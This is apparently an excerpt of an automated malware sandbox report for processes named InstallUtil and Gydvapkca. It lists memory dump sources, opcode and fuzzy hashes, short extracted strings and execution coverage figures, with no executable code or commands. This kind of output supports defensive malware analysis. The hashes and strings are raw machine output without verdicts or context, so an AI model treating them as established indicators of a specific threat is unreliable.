                          • Instruction Fuzzy Hash: 0C4159B1E016188BEB58CF6BC9557CEFAF3AFC8304F04C1AAD50CA6265DB740A858F54
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f95ce8130d41739d087611e7315ceecf6a010c95d0a47d0e2e339abaf5b62200
                          • Instruction ID: c9fb72e6ce19deafa4d6763b994fede99caed4cbd18c62b1ff967392339dc2e9
                          • Opcode Fuzzy Hash: f95ce8130d41739d087611e7315ceecf6a010c95d0a47d0e2e339abaf5b62200
                          • Instruction Fuzzy Hash: AF416AB1E016188BEB58CF6BC9557CAFAF3AFC8300F04C1AAD50CA6264DB740A858F50
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d09d2cdaf090f08b49444bd39f7f11b500585ac0384651e49138e577ef615807
                          • Instruction ID: dcadf49a4235313152d0ea1892f97a062c16b59f2eecf355662547888265c123
                          • Opcode Fuzzy Hash: d09d2cdaf090f08b49444bd39f7f11b500585ac0384651e49138e577ef615807
                          • Instruction Fuzzy Hash: 1F4167B1E016188BEB58CF6BC94578DFAF3AFC8314F04C1BAD50CA6264DB740A858F51
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9949495d1e1a296fb1d3ca02057d44912c08935d7102a49876e25690c6c5ae0c
                          • Instruction ID: 749d1f53a77e0f39cf9854fd6dcf6d7b17456be64e561992cde9fb6da913f34d
                          • Opcode Fuzzy Hash: 9949495d1e1a296fb1d3ca02057d44912c08935d7102a49876e25690c6c5ae0c
                          • Instruction Fuzzy Hash: E8415AB1E016188BEB58CF6BD9457C9FAF3AFC8300F14C1AAD50CA6265DB740A858F51
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e68f276e36ba4fb91b5ac14a8da75c0138bb85598342662b67ec0ee555881fa
                          • Instruction ID: e3d53977bc8d50d111869e8df187b0985f507729de54ce5e860398de00e79bc6
                          • Opcode Fuzzy Hash: 7e68f276e36ba4fb91b5ac14a8da75c0138bb85598342662b67ec0ee555881fa
                          • Instruction Fuzzy Hash: 0F4169B1D016188FEB58CF6BC9457D9FAF3AFC8314F14C1AAC50CA6265DB740A858F50
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: (oeq$(oeq$(oeq$(oeq$(oeq$(oeq$,iq$,iq
                          • API String ID: 0-4181857939
                          • Opcode ID: 530ae0d3f53599c2509ab79c49ccd80ce8f36e61c7dbae0365c1d5abaf6d2562
                          • Instruction ID: accffc543a9c70336d2df578af102c27bddb26dbc857cdaa6d38f2f042d27a69
                          • Opcode Fuzzy Hash: 530ae0d3f53599c2509ab79c49ccd80ce8f36e61c7dbae0365c1d5abaf6d2562
                          • Instruction Fuzzy Hash: 32122930A006498FCF15CF68D9A4A9EBBF2FF48319F15855AE9459B3A1DB30ED41CB50
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq$;eq
                          • API String ID: 0-1536740294
                          • Opcode ID: ef764a0d56fa5e69dcf4954cdd49419cdc52de8ebef34dd08da2085d221f2f50
                          • Instruction ID: 0d63fbbc9cac01c6d2bcbdec937f429dab50e9af6850dc0d1f851f7193b9f32c
                          • Opcode Fuzzy Hash: ef764a0d56fa5e69dcf4954cdd49419cdc52de8ebef34dd08da2085d221f2f50
                          • Instruction Fuzzy Hash: B1F17E713005028FEF259A2DD979B3A7B96EF84704F1944ABE142CB3B6EA35DC42C742
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 95ab5e2f78f4e91297c6d29743cf9105983bb553f77ce442f9b8957221bc7f8c
                          • Instruction ID: 869b5ac28c99e23825e52d9c2f3ec5e1b89bfb49c638228006d16a9a4892a7dc
                          • Opcode Fuzzy Hash: 95ab5e2f78f4e91297c6d29743cf9105983bb553f77ce442f9b8957221bc7f8c
                          • Instruction Fuzzy Hash: F8116D71D002488BDF09DFAAD8586DEBBB2AFCD301F08D126D418B72A9DB3448468F60
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6aaba36bb5f2629337f3e6aba15c371dd1400faf6646ae43be200498e30d42c
                          • Instruction ID: 90563c5118749c0c18fe1bbd683866c49fbf48b06ef22304ed3cce6dba3c1252
                          • Opcode Fuzzy Hash: d6aaba36bb5f2629337f3e6aba15c371dd1400faf6646ae43be200498e30d42c
                          • Instruction Fuzzy Hash: 981108357042548FD7051B7A9C1856BBFABAFCA211B558477E946C7386CE24CC468370
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2bfc0692509ee3bac8a3759cacac903fc86a32bdf8d5f1b816dc1c13ef9ba043
                          • Instruction ID: 079b78d7aee01d116c8015c3045a358e3c83dd20bffa0a5495eae975d8e276d5
                          • Opcode Fuzzy Hash: 2bfc0692509ee3bac8a3759cacac903fc86a32bdf8d5f1b816dc1c13ef9ba043
                          • Instruction Fuzzy Hash: A8216AB4D0010A8FDB45EFB9D54469EBFB2FF45304F10D6AAD108AB369EB345A45CB81
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 52592c81cc3afdb30eb3c4fb90d2db8b88dc808c1ba3c708205b9b6525251a9e
                          • Instruction ID: 15c98e06785c154b498714ac9c1eeebc164439cf3de4f0d400c0e7e42425054a
                          • Opcode Fuzzy Hash: 52592c81cc3afdb30eb3c4fb90d2db8b88dc808c1ba3c708205b9b6525251a9e
                          • Instruction Fuzzy Hash: E421CEB4D0520A8FCB41EFA8D9559EEBFF1BB49301F10466AD909F3261EB301A55CFA1
                          Memory Dump Source
                          • Source File: 00000002.00000002.4519905388.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_11fd000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                          • Instruction ID: 3fff1a55ee871b77c3cc3c60603e8514bc9c71eb3aad75e5d1809f7a0bc0b8bc
                          • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                          • Instruction Fuzzy Hash: 04119D76504240CFDF16DF54D5C4B26BF71FB84324F2486ADD9090A266C33AD45ACBA2
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 98b63431406279b0222e87f15e77ab9f6faac4f4ef71cc475c5817271ba2ff96
                          • Instruction ID: 083cc818944f785aff69d598acedf991cefe0b038ad1badc4b8ac9a8ba8be131
                          • Opcode Fuzzy Hash: 98b63431406279b0222e87f15e77ab9f6faac4f4ef71cc475c5817271ba2ff96
                          • Instruction Fuzzy Hash: 141167B6800349DFDB10CF99C844BDEBFF4EB48320F14841AEA14A7210C339A950DFA5
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 891a1ca14f8c7c545f7468b21fdc558bc8ea58c2052130c9c6107d098e3326e1
                          • Instruction ID: 17fedb7adf97a373836f2decd45f5b04cd401ce8eb1ca9cf2d6f719c345ea07d
                          • Opcode Fuzzy Hash: 891a1ca14f8c7c545f7468b21fdc558bc8ea58c2052130c9c6107d098e3326e1
                          • Instruction Fuzzy Hash: 3B1134B6800349DFDB11CF99C845BDEBFF9EB48320F14841AEA18A7251C339A954DFA1
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8028a632682f85eec9ae42174052c9ed4cda6ae9857f53b7eb0702d3923be1e
                          • Instruction ID: f0f13504fffd5a8098bebbab5b7bd8c97e88f1b1db45e861e5436304329367a9
                          • Opcode Fuzzy Hash: f8028a632682f85eec9ae42174052c9ed4cda6ae9857f53b7eb0702d3923be1e
                          • Instruction Fuzzy Hash: DB116AB8D001099FCB45EFA9D544A9EBFF2FF44304F40C6AAD118AB369EB305A45CB81
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: de4a4b14e24945b2972803d9df460c6cd1c1444faa1a9b294eb8a42d6e22dcc4
                          • Instruction ID: 7302a4ea7c708c9b5413f63e290e9d5d14e63e6d2ccbbca97cf4a00906385d4a
                          • Opcode Fuzzy Hash: de4a4b14e24945b2972803d9df460c6cd1c1444faa1a9b294eb8a42d6e22dcc4
                          • Instruction Fuzzy Hash: 50113074F001598FDF00DFE8D850B9EBBB2AF48315F019055E908E7349E73099418F50
                          Memory Dump Source
                          • Source File: 00000002.00000002.4520041759.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_120d000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                          • Instruction ID: f5d98d249131cb0a8c81ac59f0280c34f00d8741f61388d1ebeae9c7114204ff
                          • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                          • Instruction Fuzzy Hash: 9C11BB79504288CFDB12CF94D9C4B16FBA2FB84314F24C6A9D9494B697C33AD44ACB62
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 60f121b188897bea1b08ff02f8adca1293d1aaf6b096c51346a9505ed5d818cb
                          • Instruction ID: a4cce145573370d00e77233c5c141874ba9279f1aa19e32f9304fa83b36ae867
                          • Opcode Fuzzy Hash: 60f121b188897bea1b08ff02f8adca1293d1aaf6b096c51346a9505ed5d818cb
                          • Instruction Fuzzy Hash: C811AD75B002258FC790EF7DE458A6E7BF4EF8862170245BAE906DB315EB32DD058B90
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73d892c2ebf456d2a4495c4613cc8632409c878b2cde43f213d11c8ad2888430
                          • Instruction ID: a36bd73dcb2f79e2f931d40858912899b90f7a6c2223d26447220fc02ef2d100
                          • Opcode Fuzzy Hash: 73d892c2ebf456d2a4495c4613cc8632409c878b2cde43f213d11c8ad2888430
                          • Instruction Fuzzy Hash: 31019272B041156FDF059E55A820EAF3BB6DBC8651F18806AF919CB390DE718C12CB91
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 291b44331d639ad65501345fa3f2d39f039530276d7afa5a92a884961a60f34c
                          • Instruction ID: 683f59040daf9758c8e10663792ae91ed19c7823beb22c480aa58876de205443
                          • Opcode Fuzzy Hash: 291b44331d639ad65501345fa3f2d39f039530276d7afa5a92a884961a60f34c
                          • Instruction Fuzzy Hash: 9901B670E003199FCF44EFB9D951AEEBBF5AF48201F50856AD91AE7264EB345A01CB90
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73571ed593ab9a9d4e1308852d046de779102a9d6663008222834e43f108ad0c
                          • Instruction ID: ddeccf5962fe0efe25906f2684164015fe6dbcf1b0553981eacc32e44a5439ae
                          • Opcode Fuzzy Hash: 73571ed593ab9a9d4e1308852d046de779102a9d6663008222834e43f108ad0c
                          • Instruction Fuzzy Hash: FFF089363002196F8F455E989C449EF7FABEBC8250B40442EFA19D7351DF714C1197A5
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc186e77f0d2f20bc2e9e98e22c6e0d54dfa5a3360adcb1a773d2c61020608d6
                          • Instruction ID: d32263dfa08a0347d15abfc72e1a38a5484c57460ee05bb7b9d519aac583e1fe
                          • Opcode Fuzzy Hash: bc186e77f0d2f20bc2e9e98e22c6e0d54dfa5a3360adcb1a773d2c61020608d6
                          • Instruction Fuzzy Hash: 89E06870D082089BCF029FF9F80C2FABB75DB86300F006135D204A32D6CBB09116CA91
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6fa9390651c382717428cc067b91d2c9d9e575ade1268d0b90153e11782b86c8
                          • Instruction ID: 029cbf4db5f5ce2265a8caed6589fdfac80002bb47dfeb0f37f9f819362d81e1
                          • Opcode Fuzzy Hash: 6fa9390651c382717428cc067b91d2c9d9e575ade1268d0b90153e11782b86c8
                          • Instruction Fuzzy Hash: B3E06832D04205DBCF049FA9F42D2FABBB4DBC6310F409475E200A21E2CBB481198A91
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28a04309158441fa7102665bc66dca847cebb93e200036deb06956d09e9fe045
                          • Instruction ID: e53cef20554c56f509a1e42bdde3a5d3303d0ceb158b71d4e2952bf658d1b2cd
                          • Opcode Fuzzy Hash: 28a04309158441fa7102665bc66dca847cebb93e200036deb06956d09e9fe045
                          • Instruction Fuzzy Hash: 44E0D83582439A9FCB019BA5DC004DEFB34EED3210B4545A7D024A7052EB70255DCBB1
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14fd956f378eea9aeb0f92b854189b16e203ff95ad2c54a87afe6585c88450ea
                          • Instruction ID: d1d5cb2c869e203a398a50149e53a45742ad9fc8ac9deea4a857c80dc4eb05e6
                          • Opcode Fuzzy Hash: 14fd956f378eea9aeb0f92b854189b16e203ff95ad2c54a87afe6585c88450ea
                          • Instruction Fuzzy Hash: A2E02692C09140CBEF118BEA68360F9BF30CDE324178461E7D149DB6B2D238E606DB11
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd4cf82eaf0df9decd7338405e5475529924c424114af6439666125f2652f90c
                          • Instruction ID: 029bc0a622d6c8ecf8e7d7f29d452ea5785f4d4c389dded27e885aa293771617
                          • Opcode Fuzzy Hash: fd4cf82eaf0df9decd7338405e5475529924c424114af6439666125f2652f90c
                          • Instruction Fuzzy Hash: AFD05E32D2032B97CB00EBA5EC048EFFB38EED6261B958626D52437154FB702659C6E1
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                          • Instruction ID: 428c2e2f1bdcde26c88fd1fdfc886d49434c38efbf29866ce9dbfe6444fd735f
                          • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                          • Instruction Fuzzy Hash: FBC08C3320C5282EAA25108F7C45EB7BB8CE3C16B4A250137F51CC321098539C8102F4
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 233ceac36a2711e835008521884c8ffe3bae86a1e2637f35b0299aa8ad11298e
                          • Instruction ID: 69f626b0fc8cca95884cea67ee71cc3d43182410c284a3fb6166da6df5f22c1e
                          • Opcode Fuzzy Hash: 233ceac36a2711e835008521884c8ffe3bae86a1e2637f35b0299aa8ad11298e
                          • Instruction Fuzzy Hash: 4ED0677BB510189FCB049F98E840CDDB7B6FB9C221B048556F925A3261C6319961DB60
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73e8287647a496fa4ee3f2a63032e349832b0532c2575164572fb0a153af691b
                          • Instruction ID: 1cacb90f933f2523886f7db2f2686794b21a4e03e5e17c0358454f88d485a563
                          • Opcode Fuzzy Hash: 73e8287647a496fa4ee3f2a63032e349832b0532c2575164572fb0a153af691b
                          • Instruction Fuzzy Hash: A8D02EB090834A4BC307F736E94040A3F39FF81208BD44AE4B8090A80BEE780C8887A2
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 31ef1f040bb64fe0ed4c4f9bf006652001a8b2e8082cac46b431c8253be3958e
                          • Instruction ID: e0d02fca3af12f54a833d9e3b67586fe1ebae0ab85cfa07ddbbc2e7c1020fb23
                          • Opcode Fuzzy Hash: 31ef1f040bb64fe0ed4c4f9bf006652001a8b2e8082cac46b431c8253be3958e
                          • Instruction Fuzzy Hash: 15D06774D4411C8BCF20DF98DA546DCB7B0EF95300F0018D79809B2210D6305E658F11
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e537dd1e15836ece80e4d488c65715ce57dba699eb5d6fb41e18284fdc6fd8c3
                          • Instruction ID: 78c58ec7626af8ff4a9c91aedaf39cd6bd2b1c825ebd831e63118d6c82f5d242
                          • Opcode Fuzzy Hash: e537dd1e15836ece80e4d488c65715ce57dba699eb5d6fb41e18284fdc6fd8c3
                          • Instruction Fuzzy Hash: 4BC012B091470E47C547F776E9459163B6EFBC0204F904B50B11E0651ADE7418848690
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$0olp$Hiq$PHeq$PHeq$PHeq$PHeq$PHeq$PHeq$PHeq$PHeq
                          • API String ID: 0-1117033037
                          • Opcode ID: e857e1d887b787b701f724ce9281c53a71e454f844dd59cc2fd33ca0234d8d5e
                          • Instruction ID: 0f51b5aa29522ab4651df9bf872b4aaaca099ac7e5921fd9db3655449a56abfd
                          • Opcode Fuzzy Hash: e857e1d887b787b701f724ce9281c53a71e454f844dd59cc2fd33ca0234d8d5e
                          • Instruction Fuzzy Hash: 4912D2B4E002188FDB58DF69D954BDDBBB2BF89300F2081A9D909AB355DB359E81CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: Xiq$Xiq$Xiq$Xiq
                          • API String ID: 0-4026295062
                          • Opcode ID: 3d92d610578355354a45dfe376f5dd058943ad18db296ba70928271bf37b3f66
                          • Instruction ID: 62dfffa4b2a68b11b655ebd4ebf6d1fea4faa5be8bd47dc4f80ac9b9589697f8
                          • Opcode Fuzzy Hash: 3d92d610578355354a45dfe376f5dd058943ad18db296ba70928271bf37b3f66
                          • Instruction Fuzzy Hash: F451C870E042198FDF659F6888647BF7BB2FF84300F14456AD50997365DB708E85CB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: \;eq$\;eq$\;eq$\;eq
                          • API String ID: 0-3455962030
                          • Opcode ID: c863372a66e8d4baa5a0982b9372542ea1adf3592c3dcee3f3e75647bc6d98cc
                          • Instruction ID: 800cf949e72e32ee04eb82652a57132010993621c2f91ded16bfbfb642fac0fe
                          • Opcode Fuzzy Hash: c863372a66e8d4baa5a0982b9372542ea1adf3592c3dcee3f3e75647bc6d98cc
                          • Instruction Fuzzy Hash: BF0171717504148FCF56CE2DC56092B77F6AF88760716816BE501CB3B2EB71DC428B90

                          Execution Graph

                          Execution Coverage:12.6%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:186
                          Total number of Limit Nodes:7

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: TJjq$Teeq$piq$xbhq
                          • API String ID: 0-2649575939
                          • Opcode ID: ddf3e34319a20bace7b6bbc3d7f96e49dd9a50e0e31d5762a8e2577cf422c7cb
                          • Instruction ID: 9b8e62f360d1fec73af9c09bcf6094399d732d153e3ad6c2904a75376400f318
                          • Opcode Fuzzy Hash: ddf3e34319a20bace7b6bbc3d7f96e49dd9a50e0e31d5762a8e2577cf422c7cb
                          • Instruction Fuzzy Hash: C7A2C675E00628CFDB64CF69C984A99BBB2FF89304F1581E9D509AB365DB319E81CF40

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: 4661aaf809ebc450878eae709b98996239831098d38d52ce91cac0e4d1a30e63
                          • Instruction ID: f152259f130f0436313cc3fa346090083b4dfbcd875e6860bffb00745ca7ae03
                          • Opcode Fuzzy Hash: 4661aaf809ebc450878eae709b98996239831098d38d52ce91cac0e4d1a30e63
                          • Instruction Fuzzy Hash: A9425E74E1151A8FDB14CFA9D884AAEB7F2FF88300F158569D409EB359DB34A981CF90

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: 028f48267d525e213deff2ed1e25f373b6cefa47d26faf28c5ca4e42d48789c7
                          • Instruction ID: 248bd5dc2da188bc98f84969bf10fa380c817aedd6ef3b05ec70b1c9ba588ece
                          • Opcode Fuzzy Hash: 028f48267d525e213deff2ed1e25f373b6cefa47d26faf28c5ca4e42d48789c7
                          • Instruction Fuzzy Hash: 77E14F35E1152A8FDB54DF79D880AAEB7F2FF88300F158669D409EB258DB309941CB90

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
